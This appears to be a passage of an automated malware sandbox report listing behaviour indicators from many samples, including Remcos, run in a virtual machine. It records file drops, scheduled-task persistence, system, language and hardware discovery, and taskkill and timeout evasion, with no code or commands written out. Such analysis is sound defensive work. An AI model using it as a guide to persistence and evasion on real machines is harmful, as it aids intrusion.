File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-35B8I.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-6ORKR.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\is-BKHF2.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File created C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\Languages\is-AQET7.tmp C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A
File opened for modification C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\ac3.bmp C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\original.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
File created C:\Windows\fonts\pssystem-regular.ttf C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Windows\msdownld.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\msdownld.tmp\AS5B91B3.tmp\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\msdownld.tmp\AS5B91B3.tmp\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
File created C:\Windows\msdownld.tmp\AS5BC72B.tmp\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\msdownld.tmp\AS5BC72B.tmp\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\msdownld.tmp\AS5BC72B.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\sysnldcvmr.exe C:\Users\Admin\Desktop\Files\twztl.exe N/A
File opened for modification C:\Windows\fonts\pssystem-regular.ttf C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
File opened for modification C:\Windows\Logs\DirectX.log C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
File opened for modification C:\Windows\msdownld.tmp\AS5B91B3.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\Desktop\Files\twztl.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\Files\random.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\Files\frap.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\Files\kp8dnpa9.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\pornhub_downloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\PORNHU~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\surfex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Remcos\remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\surfex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\onetap.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gnabpgw\wohcj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gnabpgw\wohcj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gnabpgw\wohcj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\surfex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\twztl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gnabpgw\wohcj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a47b29fbd6f9c3720000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a47b29fb0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a47b29fb000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da47b29fb000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a47b29fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\original.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\original.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\original.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\original.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\original.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\original.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
